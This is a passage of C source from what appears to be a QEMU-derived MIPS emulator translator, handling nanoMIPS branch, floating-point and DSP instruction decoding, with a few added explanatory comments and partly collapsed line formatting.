                cond = TCG_COND_EQ;
            } else {
                cond = TCG_COND_NE;
            }
        }
        break;
    case NM_BNEIC:
        if (rt == 0 && imm == 0) {
            /* Treat as NOP */
            goto out;
        } else if (rt == 0 && imm != 0) {
            /* Unconditional branch */
        } else {
            bcond_compute = 1;
            cond = TCG_COND_NE;
        }
        break;
    case NM_BGEIC:
        if (rt == 0 && imm == 0) {
            /* Unconditional branch */
        } else {
            bcond_compute = 1;
            cond = TCG_COND_GE;
        }
        break;
    case NM_BLTIC:
        bcond_compute = 1;
        cond = TCG_COND_LT;
        break;
    case NM_BGEIUC:
        if (rt == 0 && imm == 0) {
            /* Unconditional branch */
        } else {
            bcond_compute = 1;
            cond = TCG_COND_GEU;
        }
        break;
    case NM_BLTIUC:
        bcond_compute = 1;
        cond = TCG_COND_LTU;
        break;
    default:
        MIPS_INVAL("Immediate Value Compact branch");
        generate_exception_end(ctx, EXCP_RI);
        goto out;
    }

    /* branch completion */
    clear_branch_hflags(ctx);
    ctx->base.is_jmp = DISAS_NORETURN;

    if (bcond_compute == 0) {
        /* Unconditional compact branch */
        gen_goto_tb(ctx, 0, ctx->btarget);
    } else {
        /* Conditional compact branch */
        TCGLabel *fs = gen_new_label(tcg_ctx);

        tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(cond), t0, t1, fs);
        gen_goto_tb(ctx, 1, ctx->btarget);
        gen_set_label(tcg_ctx, fs);
        gen_goto_tb(ctx, 0, ctx->base.pc_next + 4);
    }

out:
    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free(tcg_ctx, t1);
}

/* P.BALRSC type nanoMIPS R6 branches: BALRSC and BRSC */
static void gen_compute_nanomips_pbalrsc_branch(DisasContext *ctx, int rs,
                                                int rt)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0 = tcg_temp_new(tcg_ctx);
    TCGv t1 = tcg_temp_new(tcg_ctx);

    /* load rs */
    gen_load_gpr(tcg_ctx, t0, rs);

    /* link */
    if (rt != 0) {
        tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], ctx->base.pc_next + 4);
    }

    /* calculate btarget */
    tcg_gen_shli_tl(tcg_ctx, t0, t0, 1);
    tcg_gen_movi_tl(tcg_ctx, t1, ctx->base.pc_next + 4);
    gen_op_addr_add(ctx, tcg_ctx->btarget, t1, t0);

    /* branch completion */
    clear_branch_hflags(ctx);
    ctx->base.is_jmp = DISAS_NORETURN;

    /* unconditional branch to register */
    tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->btarget);
    tcg_gen_lookup_and_goto_ptr(tcg_ctx);

    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free(tcg_ctx, t1);
}

/* nanoMIPS Branches */
static void gen_compute_compact_branch_nm(DisasContext *ctx, uint32_t opc,
                                          int rs, int rt, int32_t offset)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    int bcond_compute = 0;
    TCGv t0 = tcg_temp_new(tcg_ctx);
    TCGv t1 = tcg_temp_new(tcg_ctx);

    /* Load needed operands and calculate btarget */
    switch (opc) {
    /* compact branch */
    case OPC_BGEC:
    case OPC_BLTC:
        gen_load_gpr(tcg_ctx, t0, rs);
        gen_load_gpr(tcg_ctx, t1, rt);
        bcond_compute = 1;
        ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset);
        break;
    case OPC_BGEUC:
    case OPC_BLTUC:
        if (rs == 0 || rs == rt) {
            /* OPC_BLEZALC, OPC_BGEZALC */
            /* OPC_BGTZALC, OPC_BLTZALC */
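            /*
             * Added commentary, not in the original source: these fused
             * "...ALC" (and-link) forms write the return address into
             * GPR 31 immediately below, before the operands are loaded.
             */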
            tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31],
                            ctx->base.pc_next + 4);
        }
        gen_load_gpr(tcg_ctx, t0, rs);
        gen_load_gpr(tcg_ctx, t1, rt);
        bcond_compute = 1;
        ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset);
        break;
    case OPC_BC:
        ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset);
        break;
    case OPC_BEQZC:
        if (rs != 0) {
            /* OPC_BEQZC, OPC_BNEZC */
            gen_load_gpr(tcg_ctx, t0, rs);
            bcond_compute = 1;
            ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset);
        } else {
            /* OPC_JIC, OPC_JIALC */
            TCGv tbase = tcg_temp_new(tcg_ctx);
            TCGv toffset = tcg_temp_new(tcg_ctx);

            gen_load_gpr(tcg_ctx, tbase, rt);
            tcg_gen_movi_tl(tcg_ctx, toffset, offset);
            gen_op_addr_add(ctx, tcg_ctx->btarget, tbase, toffset);
            tcg_temp_free(tcg_ctx, tbase);
            tcg_temp_free(tcg_ctx, toffset);
        }
        break;
    default:
        MIPS_INVAL("Compact branch/jump");
        generate_exception_end(ctx, EXCP_RI);
        goto out;
    }

    if (bcond_compute == 0) {
        /* Unconditional compact branch */
        switch (opc) {
        case OPC_BC:
            gen_goto_tb(ctx, 0, ctx->btarget);
            break;
        default:
            MIPS_INVAL("Compact branch/jump");
            generate_exception_end(ctx, EXCP_RI);
            goto out;
        }
    } else {
        /* Conditional compact branch */
        TCGLabel *fs = gen_new_label(tcg_ctx);

        switch (opc) {
        case OPC_BGEUC:
            if (rs == 0 && rt != 0) {
                /* OPC_BLEZALC */
                tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LE),
                                   t1, 0, fs);
            } else if (rs != 0 && rt != 0 && rs == rt) {
                /* OPC_BGEZALC */
                tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE),
                                   t1, 0, fs);
            } else {
                /* OPC_BGEUC */
                tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GEU),
                                  t0, t1, fs);
            }
            break;
        case OPC_BLTUC:
            if (rs == 0 && rt != 0) {
                /* OPC_BGTZALC */
                tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GT),
                                   t1, 0, fs);
            } else if (rs != 0 && rt != 0 && rs == rt) {
                /* OPC_BLTZALC */
                tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT),
                                   t1, 0, fs);
            } else {
                /* OPC_BLTUC */
                tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LTU),
                                  t0, t1, fs);
            }
            break;
        case OPC_BGEC:
            if (rs == 0 && rt != 0) {
                /* OPC_BLEZC */
                tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LE),
                                   t1, 0, fs);
            } else if (rs != 0 && rt != 0 && rs == rt) {
                /* OPC_BGEZC */
                tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE),
                                   t1, 0, fs);
            } else {
                /* OPC_BGEC */
                tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE),
                                  t0, t1, fs);
            }
            break;
        case OPC_BLTC:
            if (rs == 0 && rt != 0) {
                /* OPC_BGTZC */
                tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GT),
                                   t1, 0, fs);
            } else if (rs != 0 && rt != 0 && rs == rt) {
                /* OPC_BLTZC */
                tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT),
                                   t1, 0, fs);
            } else {
                /* OPC_BLTC */
                tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT),
                                  t0, t1, fs);
            }
            break;
        case OPC_BEQZC:
            tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ),
                               t0, 0, fs);
            break;
        default:
            MIPS_INVAL("Compact conditional branch/jump");
            generate_exception_end(ctx, EXCP_RI);
            goto out;
        }

        /* branch completion */
        clear_branch_hflags(ctx);
        ctx->base.is_jmp = DISAS_NORETURN;

        /* Generating branch here as compact branches don't have a delay slot */
        gen_goto_tb(ctx, 1, ctx->btarget);
        gen_set_label(tcg_ctx, fs);
        gen_goto_tb(ctx, 0, ctx->base.pc_next + 4);
    }

out:
    tcg_temp_free(tcg_ctx, t0);
    tcg_temp_free(tcg_ctx, t1);
}

/* nanoMIPS CP1 Branches */
static void gen_compute_branch_cp1_nm(DisasContext *ctx, uint32_t op,
                                      int32_t ft, int32_t offset)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    target_ulong btarget;
    TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx);

    gen_load_fpr64(ctx, t0, ft);
    tcg_gen_andi_i64(tcg_ctx, t0, t0, 1);

    btarget = addr_add(ctx, ctx->base.pc_next + 4, offset);

    switch (op) {
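    /*
     * Added commentary, not in the original source: nanoMIPS CP1 compact
     * branches test bit 0 of the selected FPR (masked above). BC1NEZC can
     * use that bit as the branch condition directly, while BC1EQZC inverts
     * it with the xori below, so 'bcond' ends up 1 exactly when the branch
     * is taken.
     */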
case NM_BC1EQZC: tcg_gen_xori_i64(tcg_ctx, t0, t0, 1); ctx->hflags |= MIPS_HFLAG_BC; break; case NM_BC1NEZC: /* t0 already set */ ctx->hflags |= MIPS_HFLAG_BC; break; default: MIPS_INVAL("cp1 cond branch"); generate_exception_end(ctx, EXCP_RI); goto out; } tcg_gen_trunc_i64_tl(tcg_ctx, tcg_ctx->bcond, t0); ctx->btarget = btarget; out: tcg_temp_free_i64(tcg_ctx, t0); } static void gen_p_lsx(DisasContext *ctx, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); if ((extract32(ctx->opcode, 6, 1)) == 1) { /* PP.LSXS instructions require shifting */ switch (extract32(ctx->opcode, 7, 4)) { case NM_SHXS: check_nms(ctx); /* fall through */ case NM_LHXS: case NM_LHUXS: tcg_gen_shli_tl(tcg_ctx, t0, t0, 1); break; case NM_SWXS: check_nms(ctx); /* fall through */ case NM_LWXS: case NM_LWC1XS: case NM_SWC1XS: tcg_gen_shli_tl(tcg_ctx, t0, t0, 2); break; case NM_LDC1XS: case NM_SDC1XS: tcg_gen_shli_tl(tcg_ctx, t0, t0, 3); break; } } gen_op_addr_add(ctx, t0, t0, t1); switch (extract32(ctx->opcode, 7, 4)) { case NM_LBX: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_SB); gen_store_gpr(tcg_ctx, t0, rd); break; case NM_LHX: /*case NM_LHXS:*/ tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TESW); gen_store_gpr(tcg_ctx, t0, rd); break; case NM_LWX: /*case NM_LWXS:*/ tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TESL); gen_store_gpr(tcg_ctx, t0, rd); break; case NM_LBUX: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_UB); gen_store_gpr(tcg_ctx, t0, rd); break; case NM_LHUX: /*case NM_LHUXS:*/ tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TEUW); gen_store_gpr(tcg_ctx, t0, rd); break; case NM_SBX: check_nms(ctx); gen_load_gpr(tcg_ctx, t1, rd); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_8); break; case NM_SHX: /*case NM_SHXS:*/ check_nms(ctx); gen_load_gpr(tcg_ctx, t1, rd); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUW); break; case NM_SWX: /*case NM_SWXS:*/ check_nms(ctx); gen_load_gpr(tcg_ctx, t1, rd); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); break; case NM_LWC1X: /*case NM_LWC1XS:*/ case NM_LDC1X: /*case NM_LDC1XS:*/ case NM_SWC1X: /*case NM_SWC1XS:*/ case NM_SDC1X: /*case NM_SDC1XS:*/ if (ctx->CP0_Config1 & (1 << CP0C1_FP)) { check_cp1_enabled(ctx); switch (extract32(ctx->opcode, 7, 4)) { case NM_LWC1X: /*case NM_LWC1XS:*/ gen_flt_ldst(ctx, OPC_LWC1, rd, t0); break; case NM_LDC1X: /*case NM_LDC1XS:*/ gen_flt_ldst(ctx, OPC_LDC1, rd, t0); break; case NM_SWC1X: /*case NM_SWC1XS:*/ gen_flt_ldst(ctx, OPC_SWC1, rd, t0); break; case NM_SDC1X: /*case NM_SDC1XS:*/ gen_flt_ldst(ctx, OPC_SDC1, rd, t0); break; } } else { generate_exception_err(ctx, EXCP_CpU, 1); } break; default: generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_pool32f_nanomips_insn(DisasContext *ctx) { int rt, rs, rd; rt = extract32(ctx->opcode, 21, 5); rs = extract32(ctx->opcode, 16, 5); rd = extract32(ctx->opcode, 11, 5); if (!(ctx->CP0_Config1 & (1 << CP0C1_FP))) { generate_exception_end(ctx, EXCP_RI); return; } check_cp1_enabled(ctx); switch (extract32(ctx->opcode, 0, 3)) { case NM_POOL32F_0: switch (extract32(ctx->opcode, 3, 7)) { case NM_RINT_S: gen_farith(ctx, OPC_RINT_S, 0, rt, rs, 0); break; case NM_RINT_D: gen_farith(ctx, OPC_RINT_D, 0, rt, rs, 0); break; case NM_CLASS_S: gen_farith(ctx, OPC_CLASS_S, 0, rt, rs, 0); break; case NM_CLASS_D: gen_farith(ctx, 
OPC_CLASS_D, 0, rt, rs, 0); break; case NM_ADD_S: gen_farith(ctx, OPC_ADD_S, rt, rs, rd, 0); break; case NM_ADD_D: gen_farith(ctx, OPC_ADD_D, rt, rs, rd, 0); break; case NM_SUB_S: gen_farith(ctx, OPC_SUB_S, rt, rs, rd, 0); break; case NM_SUB_D: gen_farith(ctx, OPC_SUB_D, rt, rs, rd, 0); break; case NM_MUL_S: gen_farith(ctx, OPC_MUL_S, rt, rs, rd, 0); break; case NM_MUL_D: gen_farith(ctx, OPC_MUL_D, rt, rs, rd, 0); break; case NM_DIV_S: gen_farith(ctx, OPC_DIV_S, rt, rs, rd, 0); break; case NM_DIV_D: gen_farith(ctx, OPC_DIV_D, rt, rs, rd, 0); break; case NM_SELEQZ_S: gen_sel_s(ctx, OPC_SELEQZ_S, rd, rt, rs); break; case NM_SELEQZ_D: gen_sel_d(ctx, OPC_SELEQZ_D, rd, rt, rs); break; case NM_SELNEZ_S: gen_sel_s(ctx, OPC_SELNEZ_S, rd, rt, rs); break; case NM_SELNEZ_D: gen_sel_d(ctx, OPC_SELNEZ_D, rd, rt, rs); break; case NM_SEL_S: gen_sel_s(ctx, OPC_SEL_S, rd, rt, rs); break; case NM_SEL_D: gen_sel_d(ctx, OPC_SEL_D, rd, rt, rs); break; case NM_MADDF_S: gen_farith(ctx, OPC_MADDF_S, rt, rs, rd, 0); break; case NM_MADDF_D: gen_farith(ctx, OPC_MADDF_D, rt, rs, rd, 0); break; case NM_MSUBF_S: gen_farith(ctx, OPC_MSUBF_S, rt, rs, rd, 0); break; case NM_MSUBF_D: gen_farith(ctx, OPC_MSUBF_D, rt, rs, rd, 0); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32F_3: switch (extract32(ctx->opcode, 3, 3)) { case NM_MIN_FMT: switch (extract32(ctx->opcode, 9, 1)) { case FMT_SDPS_S: gen_farith(ctx, OPC_MIN_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MIN_D, rt, rs, rd, 0); break; } break; case NM_MAX_FMT: switch (extract32(ctx->opcode, 9, 1)) { case FMT_SDPS_S: gen_farith(ctx, OPC_MAX_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MAX_D, rt, rs, rd, 0); break; } break; case NM_MINA_FMT: switch (extract32(ctx->opcode, 9, 1)) { case FMT_SDPS_S: gen_farith(ctx, OPC_MINA_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MINA_D, rt, rs, rd, 0); break; } break; case NM_MAXA_FMT: switch (extract32(ctx->opcode, 9, 1)) { case FMT_SDPS_S: gen_farith(ctx, OPC_MAXA_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MAXA_D, rt, rs, rd, 0); break; } break; case NM_POOL32FXF: switch (extract32(ctx->opcode, 6, 8)) { case NM_CFC1: gen_cp1(ctx, OPC_CFC1, rt, rs); break; case NM_CTC1: gen_cp1(ctx, OPC_CTC1, rt, rs); break; case NM_MFC1: gen_cp1(ctx, OPC_MFC1, rt, rs); break; case NM_MTC1: gen_cp1(ctx, OPC_MTC1, rt, rs); break; case NM_MFHC1: gen_cp1(ctx, OPC_MFHC1, rt, rs); break; case NM_MTHC1: gen_cp1(ctx, OPC_MTHC1, rt, rs); break; case NM_CVT_S_PL: gen_farith(ctx, OPC_CVT_S_PL, -1, rs, rt, 0); break; case NM_CVT_S_PU: gen_farith(ctx, OPC_CVT_S_PU, -1, rs, rt, 0); break; default: switch (extract32(ctx->opcode, 6, 9)) { case NM_CVT_L_S: gen_farith(ctx, OPC_CVT_L_S, -1, rs, rt, 0); break; case NM_CVT_L_D: gen_farith(ctx, OPC_CVT_L_D, -1, rs, rt, 0); break; case NM_CVT_W_S: gen_farith(ctx, OPC_CVT_W_S, -1, rs, rt, 0); break; case NM_CVT_W_D: gen_farith(ctx, OPC_CVT_W_D, -1, rs, rt, 0); break; case NM_RSQRT_S: gen_farith(ctx, OPC_RSQRT_S, -1, rs, rt, 0); break; case NM_RSQRT_D: gen_farith(ctx, OPC_RSQRT_D, -1, rs, rt, 0); break; case NM_SQRT_S: gen_farith(ctx, OPC_SQRT_S, -1, rs, rt, 0); break; case NM_SQRT_D: gen_farith(ctx, OPC_SQRT_D, -1, rs, rt, 0); break; case NM_RECIP_S: gen_farith(ctx, OPC_RECIP_S, -1, rs, rt, 0); break; case NM_RECIP_D: gen_farith(ctx, OPC_RECIP_D, -1, rs, rt, 0); break; case NM_FLOOR_L_S: gen_farith(ctx, OPC_FLOOR_L_S, -1, rs, rt, 0); break; case NM_FLOOR_L_D: gen_farith(ctx, OPC_FLOOR_L_D, -1, rs, rt, 0); break; 
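            /*
             * Added commentary, not in the original source: the unary FP
             * operations in this switch (conversions, roundings, sqrt, abs,
             * neg, mov) all funnel through gen_farith() with -1 in the
             * unused 'ft' slot; only fs (source) and fd (destination)
             * matter. For instance, FLOOR.W.S behaves like this plain-C
             * sketch:
             */
#if 0 /* illustrative only; would need <math.h>, ignores NaN/overflow */
            static int32_t floor_w_s(float fs) { return (int32_t)floorf(fs); }
#endif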
case NM_FLOOR_W_S: gen_farith(ctx, OPC_FLOOR_W_S, -1, rs, rt, 0); break; case NM_FLOOR_W_D: gen_farith(ctx, OPC_FLOOR_W_D, -1, rs, rt, 0); break; case NM_CEIL_L_S: gen_farith(ctx, OPC_CEIL_L_S, -1, rs, rt, 0); break; case NM_CEIL_L_D: gen_farith(ctx, OPC_CEIL_L_D, -1, rs, rt, 0); break; case NM_CEIL_W_S: gen_farith(ctx, OPC_CEIL_W_S, -1, rs, rt, 0); break; case NM_CEIL_W_D: gen_farith(ctx, OPC_CEIL_W_D, -1, rs, rt, 0); break; case NM_TRUNC_L_S: gen_farith(ctx, OPC_TRUNC_L_S, -1, rs, rt, 0); break; case NM_TRUNC_L_D: gen_farith(ctx, OPC_TRUNC_L_D, -1, rs, rt, 0); break; case NM_TRUNC_W_S: gen_farith(ctx, OPC_TRUNC_W_S, -1, rs, rt, 0); break; case NM_TRUNC_W_D: gen_farith(ctx, OPC_TRUNC_W_D, -1, rs, rt, 0); break; case NM_ROUND_L_S: gen_farith(ctx, OPC_ROUND_L_S, -1, rs, rt, 0); break; case NM_ROUND_L_D: gen_farith(ctx, OPC_ROUND_L_D, -1, rs, rt, 0); break; case NM_ROUND_W_S: gen_farith(ctx, OPC_ROUND_W_S, -1, rs, rt, 0); break; case NM_ROUND_W_D: gen_farith(ctx, OPC_ROUND_W_D, -1, rs, rt, 0); break; case NM_MOV_S: gen_farith(ctx, OPC_MOV_S, -1, rs, rt, 0); break; case NM_MOV_D: gen_farith(ctx, OPC_MOV_D, -1, rs, rt, 0); break; case NM_ABS_S: gen_farith(ctx, OPC_ABS_S, -1, rs, rt, 0); break; case NM_ABS_D: gen_farith(ctx, OPC_ABS_D, -1, rs, rt, 0); break; case NM_NEG_S: gen_farith(ctx, OPC_NEG_S, -1, rs, rt, 0); break; case NM_NEG_D: gen_farith(ctx, OPC_NEG_D, -1, rs, rt, 0); break; case NM_CVT_D_S: gen_farith(ctx, OPC_CVT_D_S, -1, rs, rt, 0); break; case NM_CVT_D_W: gen_farith(ctx, OPC_CVT_D_W, -1, rs, rt, 0); break; case NM_CVT_D_L: gen_farith(ctx, OPC_CVT_D_L, -1, rs, rt, 0); break; case NM_CVT_S_D: gen_farith(ctx, OPC_CVT_S_D, -1, rs, rt, 0); break; case NM_CVT_S_W: gen_farith(ctx, OPC_CVT_S_W, -1, rs, rt, 0); break; case NM_CVT_S_L: gen_farith(ctx, OPC_CVT_S_L, -1, rs, rt, 0); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; } break; } break; case NM_POOL32F_5: switch (extract32(ctx->opcode, 3, 3)) { case NM_CMP_CONDN_S: gen_r6_cmp_s(ctx, extract32(ctx->opcode, 6, 5), rt, rs, rd); break; case NM_CMP_CONDN_D: gen_r6_cmp_d(ctx, extract32(ctx->opcode, 6, 5), rt, rs, rd); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; default: generate_exception_end(ctx, EXCP_RI); break; } } static void gen_pool32a5_nanomips_insn(DisasContext *ctx, int opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ret = rd; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv v1_t = tcg_temp_new(tcg_ctx); TCGv v2_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, v1_t, rs); gen_load_gpr(tcg_ctx, v2_t, rt); switch (opc) { case NM_CMP_EQ_PH: check_dsp(ctx); gen_helper_cmp_eq_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case NM_CMP_LT_PH: check_dsp(ctx); gen_helper_cmp_lt_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case NM_CMP_LE_PH: check_dsp(ctx); gen_helper_cmp_le_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case NM_CMPU_EQ_QB: check_dsp(ctx); gen_helper_cmpu_eq_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case NM_CMPU_LT_QB: check_dsp(ctx); gen_helper_cmpu_lt_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case NM_CMPU_LE_QB: check_dsp(ctx); gen_helper_cmpu_le_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case NM_CMPGU_EQ_QB: check_dsp(ctx); gen_helper_cmpgu_eq_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_CMPGU_LT_QB: check_dsp(ctx); gen_helper_cmpgu_lt_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_CMPGU_LE_QB: check_dsp(ctx); gen_helper_cmpgu_le_qb(tcg_ctx, v1_t, v1_t, 
v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_CMPGDU_EQ_QB: check_dsp_r2(ctx); gen_helper_cmpgu_eq_qb(tcg_ctx, v1_t, v1_t, v2_t); tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, v1_t, 24, 4); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_CMPGDU_LT_QB: check_dsp_r2(ctx); gen_helper_cmpgu_lt_qb(tcg_ctx, v1_t, v1_t, v2_t); tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, v1_t, 24, 4); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_CMPGDU_LE_QB: check_dsp_r2(ctx); gen_helper_cmpgu_le_qb(tcg_ctx, v1_t, v1_t, v2_t); tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, v1_t, 24, 4); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_PACKRL_PH: check_dsp(ctx); gen_helper_packrl_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_PICK_QB: check_dsp(ctx); gen_helper_pick_qb(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_PICK_PH: check_dsp(ctx); gen_helper_pick_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_ADDQ_S_W: check_dsp(ctx); gen_helper_addq_s_w(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SUBQ_S_W: check_dsp(ctx); gen_helper_subq_s_w(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_ADDSC: check_dsp(ctx); gen_helper_addsc(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_ADDWC: check_dsp(ctx); gen_helper_addwc(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_ADDQ_S_PH: check_dsp(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* ADDQ_PH */ gen_helper_addq_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* ADDQ_S_PH */ gen_helper_addq_s_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_ADDQH_R_PH: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* ADDQH_PH */ gen_helper_addqh_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* ADDQH_R_PH */ gen_helper_addqh_r_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_ADDQH_R_W: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* ADDQH_W */ gen_helper_addqh_w(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* ADDQH_R_W */ gen_helper_addqh_r_w(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_ADDU_S_QB: check_dsp(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* ADDU_QB */ gen_helper_addu_qb(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* ADDU_S_QB */ gen_helper_addu_s_qb(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_ADDU_S_PH: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* ADDU_PH */ gen_helper_addu_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* ADDU_S_PH */ gen_helper_addu_s_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_ADDUH_R_QB: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* ADDUH_QB */ gen_helper_adduh_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* 
ADDUH_R_QB */ gen_helper_adduh_r_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SHRAV_R_PH: check_dsp(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SHRAV_PH */ gen_helper_shra_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SHRAV_R_PH */ gen_helper_shra_r_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SHRAV_R_QB: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SHRAV_QB */ gen_helper_shra_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SHRAV_R_QB */ gen_helper_shra_r_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SUBQ_S_PH: check_dsp(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SUBQ_PH */ gen_helper_subq_ph(tcg_ctx, 